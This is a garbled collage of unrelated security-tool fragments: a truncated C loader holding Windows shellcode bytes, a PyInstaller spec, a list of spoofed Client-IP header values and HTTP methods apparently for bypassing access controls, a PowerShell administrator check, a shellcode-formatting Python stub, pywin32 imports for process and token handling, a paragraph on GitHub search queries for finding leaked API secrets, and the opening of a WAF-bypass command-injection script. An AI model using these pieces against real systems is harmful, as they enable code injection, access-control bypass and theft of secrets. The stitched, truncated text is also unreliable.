https://gist.github.com/mate-h/fc8f21bd3ce9e3ad1737b85f795bab07
https://github.com/venaxyt/mysterium
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode (the byte array is cut off here in the source)
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
# -*- mode: python ; coding: utf-8 -*-
from PyInstaller.utils.hooks import collect_data_files
from ultralytics import YOLO
block_cipher = None
ultra_files = collect_data_files('ultralytics')
a = Analysis(
    ['main.py'],
    pathex=[],
Allow: CONNECT
Allow: GET
Allow: HEAD
Allow: POST
Allow: TRACE
Client-IP: 0
Client-IP: 0177.0000.0000.0001
Client-IP: 0x7F000001
Client-IP: 10.0.0.0
Client-IP: 10.0.0.1
Ref: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a
# PrivCheck
# Abort unless the current process token holds the built-in Administrator role
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Write-Warning "Please run this script as an Administrator!"
    Exit
}
#!/usr/bin/env python
import sys
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("usage: %s file.bin\n" % (sys.argv[0],))
        sys.exit(0)
    # Output buffer starts with the opening quote of a C string literal
    shellcode = "\""
    ctr = 1
    maxlen = 15
import win32api
import win32con
import win32process
import win32security
import win32file  # For CreateFile
import ctypes
from ctypes import wintypes
import os
import psutil
For a security professional, thorough reconnaissance is essential. With the growing use of APIs, keeping access tokens and other API-related secrets secure is paramount to preventing leaks. Despite technological advances, human error remains a factor: many developers still unknowingly hardcode API secrets into source code and commit them to public repositories. GitHub, as a widely used host for public repositories, may therefore inadvertently expose such leaked secrets. To help identify these exposures, I have created a comprehensive search list that uses GitHub's search syntax to surface thousands of leaked keys and secrets in a single query.
(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))
**1.
#!/usr/bin/env node
/*
Accompanying code for the tweet in PT SWARM.
Tweet's text:
Simple way to bypass a WAF in Command Injections!
Also helps with length restrictions!
Tweet's link: https://twitter.com/ptswarm/status/1799069750863270364